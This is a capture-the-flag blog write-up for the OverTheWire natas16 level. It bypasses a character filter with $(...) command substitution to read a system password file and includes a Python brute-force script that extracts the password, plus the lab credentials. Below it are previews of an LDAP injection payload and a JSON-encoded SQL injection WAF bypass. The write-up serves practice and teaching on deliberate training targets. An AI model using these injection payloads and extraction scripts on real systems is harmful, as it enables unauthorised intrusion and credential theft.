Command Injection-----Write up for natas 16

Command Injection--Write up for natas 16

Problem: find the password of natas17.
The url of this problem is 'http://natas16.natas.labs.overthewire.org/'



Step 1: view the source code



  • As we can see that, if any of the following characters are found in the input we provide to the form: ; | & ` ' ",  the 'preg_match' function will filter the request and print "illegal match", this request will not send to the server.
"grep -i \"$key\" dictionary.txt" 
  • \"$key\" : \" means it will escape " so that our input will turn to be a string.
But the good news is that it didn't filter the '$', so we can still use "$(command)".  

Then we try to check it, luckily it works! It demonstrates that 'aa' is in 'dictionary.txt', meanwhile '$(echo aa)' returned 'aa' and executed successfully.


If we try to get the password stored in the '/etc/natas_webpass/natas17', like this:

“cat /etc/natas_webpass/natas17" 
 
This string will also 'grep' in 'dictionary.txt'
it will be like this finally:

grep -i "$(cat /etc/natas_webpass/natas17)" dictionay.txt 

We know that it is impossible to find the flag in the 'dictionary.txt', so it will return no output.

Step 2: concatenate a string within the 'dictionary.txt' with the flag.

As we test 'aa' before, there is a word 'aardvark' in the dictionary. Relatively, If we concatenate the flag with this word to grep in the 'dicitonary.txt',  it will return no output.
 

grep -i "$(cat /etc/natas_webpass/natas17)aardvark" dictionay.txt 

So we can do brute force to find the flag from the first to last one. If the there is not output, that means the character we iterated is in the flag. 'password' is the part of the flag we have got, and the 'char' is the character we are brute forcing now.


grep -i $(grep ^'+password+char+' /etc/natas_webpass/natas17) dictionay.txt 


Step 3: write the script to iterate:

We have to iterate all the upper and lower alphabets and digits, so we import 'string' library. To send a http request, we import 'requests' library.

import string
import requests
characters = string.ascii_letters + string.digits

url = "http://natas16.natas.labs.overthewire.org/"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
password = ""
passlength = 32
exists_str = "aardvark"

# go through the loop till password is 32 characters long and then go into the loop passing all characters
while len(password) != 32:
    for char in characters:
        uri = ''.join([url+'?needle=$(grep ^'+password+char+' /etc/natas_webpass/natas17)&submit=Search'])
        r = requests.get(uri, auth=(auth_username, auth_password))
        if exists_str not in r.text:
            password += char
            print("Password: {0}".format(password)) 


Step 4: run the script:

it will take a little time:

the flag is 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Popular posts from this blog

Phonebook - Hack the box Write up -- Web LDAP injection

Image
 0x00 Problem  0x01 Check the vulnerability When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.  We can see that this need us to login with workstation username, it might be LDAP injection. 0x02 LDAP injection payload Here is the basic LDAP injection payload. We can check the vulnerability. user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&))  After we type it, we found the response shows successful, and return a page has search box. Then we type a character in the search box, and it returns some user phonebook information. I tried 'flag', 'HTB', it doesn't find any results. Then we try to find user 'Reese', but the information doesn't look like flag.   0x03 Locate the flag  Then we change our payload to check if the password is the flag. user=Reese password=HTB*)(& --> (&(user=Reese)(password=HTB*)(&  It can also return to the search page which means it...
Read more

wafwaf -- Hack The Box -- Web SQL injection

Image
0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...
Read more

Cheat sheet for security+

Image
Malware virus: need people action to execute and spread. Hoax: trick the victim to infect, like game. worms: spread and execute without humman  trojans: can get remote control. RAT(remote access Trojan) ransomware: take control of your computer system, pay for unlock, most time will not unlock if you pay spyware: audit the callender, website history and other actions. rootkit: a type of backdoor, software design to administrative level control or root priviledge without detection. use DLL injection. malicious code inserted into a running process or kernel-mode device drvier. intercept calls and redirect to the malicous code. spam: CAN-Spam Act law to stop relaying send out email through other's mail server. Spim(instant message) like chat, text message.
Read more